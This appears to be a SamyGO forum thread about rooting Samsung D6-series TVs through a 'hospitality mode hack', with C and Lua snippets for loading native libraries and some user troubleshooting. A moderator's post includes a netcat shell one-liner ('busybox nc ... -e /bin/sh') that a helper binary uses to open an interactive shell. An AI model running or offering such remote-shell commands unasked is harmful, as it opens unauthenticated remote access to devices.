Hospitality mode hack (for D6 series only) - updated

Here is information about customize your D series firmware..:!:This forum is NOT FOR USER questions or problems but DEVELOPER.

User avatar
juusso
SamyGO Moderator
Posts: 10129
Joined: Sun Mar 07, 2010 6:20 pm

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by juusso »

murfd is made by murfdude and no sources known. But i remember he posted this as example:

Code: Select all

    #include <stdlib.h>
    int luaopen_myfunc() {
      system("ping -w 10 123.123.123.123");
      return 0;
    }
compiling:

Code: Select all

    gcc -Wall -fPIC -c mylib.c
    gcc -shared -o mylib.so mylib.o
call your function with this:

Code: Select all

function Game_Main(mypath)
  myfunc=assert(package.loadlib(mypath.."mylib.so", "luaopen_myfunc"))
  myfunc()
end
This is not what you`re asking for, but same way you can compile the murfd
(this just opens nc interactive shell on your wanted port, like: busybox nc 123.123.123.123 1234 -e /bin/sh)
LE40B653T5W,UE40D6750,UE65Q8C
Have questions? Read SamyGO Wiki, Search on forum first!
FFB (v0.8), FFB for CI+ . Get root on: C series, D series, E series, F series, H series. rooting K series, exeDSP/exeTV patches[C/D/E/F/H]

DO NOT EVER INSTALL FIRMWARE UPGRADE
setti
SamyGO Project Donor
Posts: 131
Joined: Sat Jan 07, 2012 11:32 am

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by setti »

Thanks so much for all this helping information.
Seems I've a task for this evening (wife is working *lol*) ;)
User avatar
juusso
SamyGO Moderator
Posts: 10129
Joined: Sun Mar 07, 2010 6:20 pm

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by juusso »

This is how SamyGO starts now from widget. Don`t know if the sdl free version is needed here. Also don`t know if you don`t get crash because sdl graphic...

Code: Select all

function Game_Main(resPath)
	
	chResPath = resPath.."/Res/"
	print("resPath ", chResPath)
	main_call=assert(package.loadlib(resPath.."game.so", "Game_Main"))
	main_call(chResPath) 
(check main.lua file)
LE40B653T5W,UE40D6750,UE65Q8C
Have questions? Read SamyGO Wiki, Search on forum first!
FFB (v0.8), FFB for CI+ . Get root on: C series, D series, E series, F series, H series. rooting K series, exeDSP/exeTV patches[C/D/E/F/H]

DO NOT EVER INSTALL FIRMWARE UPGRADE
setti
SamyGO Project Donor
Posts: 131
Joined: Sat Jan 07, 2012 11:32 am

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by setti »

Thanks... Already found that. But it get the following message:

Code: Select all

/mtd_rwarea/bin/murfd /mtd_rwcommon/widgets/user/SamyGO/game.so Game_Main
Can't load /mtd_rwcommon/widgets/user/SamyGO/game.so

ls -al /mtd_rwcommon/widgets/user/SamyGO/game.so
-rwxr-xr-x    1 root     0           37164 Jan  6  2012 /mtd_rwcommon/widgets/user/SamyGO/game.so
So i tried it with the chanInfo standalone app:

Code: Select all

/mtd_rwarea/bin/murfd /mtd_rwcommon/widgets/user/ChannelInfo/loader.so Game_Main
But i dont get any response. Even via Ex-Link there is no message.

PS: Permissions are alright.....
User avatar
juusso
SamyGO Moderator
Posts: 10129
Joined: Sun Mar 07, 2010 6:20 pm

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by juusso »

Then we need alternative game.so without sdl text and graphic. Gona ask Denny.
LE40B653T5W,UE40D6750,UE65Q8C
Have questions? Read SamyGO Wiki, Search on forum first!
FFB (v0.8), FFB for CI+ . Get root on: C series, D series, E series, F series, H series. rooting K series, exeDSP/exeTV patches[C/D/E/F/H]

DO NOT EVER INSTALL FIRMWARE UPGRADE
setti
SamyGO Project Donor
Posts: 131
Joined: Sat Jan 07, 2012 11:32 am

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by setti »

Would be nice if it were so easy :)
Beefz
Posts: 6
Joined: Sun May 13, 2012 9:02 pm

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by Beefz »

Hi there, i've got UE46D6530 TGASDEUC-1018.
Tried the root and hospitality mode hack both but still wont start the samygo app it just return te smarthub.
Is there any way to get it working?
DEUS
Official SamyGO Developer
Posts: 316
Joined: Mon Feb 06, 2012 12:05 pm
Location: Germany

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by DEUS »

READ!!! READ!!! READ!!! < Sorry but this was neccesary. The widget wont start with your FW, but you have shell and ftp access or?
nivok
Posts: 6
Joined: Thu Aug 18, 2011 9:08 am

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by nivok »

Hi all,

First off, thanks for the hack, works fine here with UE55D6350 T-GAS6DEUC 1016.0.

A small question although: Looks like that hack killed the possibility for the TV to receive messages, appointments, contacts... before I was able to use the SOAP functions to display the incomming call window, with always a HTTP 200 OK response. Now the TV always respond with HTTP 401 Unauthorized.

Does anyone have the same behavior? If yes has anybody a way to fix that?

Thanks and cheers,
Nick
Beefz
Posts: 6
Joined: Sun May 13, 2012 9:02 pm

Re: SamyGO Hospitality mode hack (for D6 series only)

Post by Beefz »

Hi there Deus i tried connecting with the ftp without succes, i don't mind reading in fact i spend some time on it already on these pages and the wikis but can you nudge me to the right direction where to read?

Post Reply

Return to “[D] Firmware”